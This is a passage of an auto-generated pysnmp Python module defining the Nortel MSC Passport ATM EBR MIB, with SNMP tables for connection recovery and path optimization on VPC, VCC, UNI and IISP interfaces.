mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrc", "mscAtmIfVptVccSrcIndex", "mscAtmIfVccSrcIndex", "mscAtmIfVptVccSrc", "mscAtmIfVpcSrcIndex", "mscAtmIfVccSrc")
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex", "mscAtmIfPnniIndex", "mscAtmIfPnni", "mscAtmIfVptPnni")
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUni", "mscAtmIfUni", "mscAtmIfUniIndex", "mscAtmIfVptUniIndex")
Counter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Counter32", "DisplayString", "Gauge32", "StorageType", "RowStatus")
NonReplicated, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated")
mscPassportMIBs, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "ObjectIdentity", "ModuleIdentity", "Bits", "Counter32", "IpAddress", "Gauge32", "NotificationType", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Unsigned32", "Counter64", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())
